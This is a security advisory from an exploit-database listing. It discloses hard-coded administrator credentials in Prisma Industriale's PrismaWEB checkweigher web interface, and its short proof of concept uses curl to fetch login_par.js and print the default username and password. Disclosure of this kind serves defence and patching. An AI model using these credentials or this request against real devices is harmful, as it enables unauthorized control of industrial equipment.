3f6d16d5c3
8 changes to exploits/shellcodes Sony Playstation 4 (PS4) 1.76 - 'dlclose' Linux Loader Sony Playstation 4 (PS4) 1.76 - 'dlclose' Linux Kernel Loader SC 7.16 - Stack-Based Buffer Overflow DEWESoft X3 SP1 (64-bit) - Remote Command Execution Eclipse Equinoxe OSGi Console - Command Execution (Metasploit) ManageEngine Applications Manager 13.5 - Remote Code Execution (Metasploit) Prisma Industriale Checkweigher PrismaWEB 1.21 - Hard-Coded Credentials TextPattern 4.6.2 - 'qty' SQL Injection Advantech WebAccess < 8.3 - Directory Traversal / Remote Code Execution ACL Analytics 11.X - 13.0.0.579 - Arbitrary Code Execution
36 lines
No EOL
1.2 KiB
Text
36 lines
No EOL
1.2 KiB
Text
Prisma Industriale Checkweigher PrismaWEB 1.21 Authentication Bypass
|
|
|
|
|
|
Vendor: Prisma Industriale S.r.l.
|
|
Product web page: https://www.prismaindustriale.com
|
|
Affected version: 1.0 (Rev 21, EPROM 202FWSAM ??)
|
|
|
|
Summary: Web Administration of Machine.
|
|
|
|
Desc: The vulnerability exists due to the disclosure of hard-coded credentials allowing
|
|
an attacker to effectively bypass authentication of PrismaWEB with administrator
|
|
privileges. The credentials can be disclosed by simply navigating to the login_par.js
|
|
JavaScript page that holds the username and password for the management interface that
|
|
are being used via the Login() function in /scripts/functions_cookie.js script.
|
|
|
|
Tested on: HMS AnyBus-S WebServer
|
|
|
|
|
|
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
|
@zeroscience
|
|
|
|
|
|
Advisory ID: ZSL-2018-5453
|
|
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5453.php
|
|
|
|
06.02.2018
|
|
|
|
---
|
|
|
|
|
|
$ curl http://10.10.10.70/user/scripts/login_par.js
|
|
// JavaScript Document
|
|
// 11 Dicembre 2009 Release 1.0 Rev.10
|
|
|
|
var txtChkUser = "prismaweb"; // Nome utente Login
|
|
var txtChkPassword = "prisma"; // Password Login |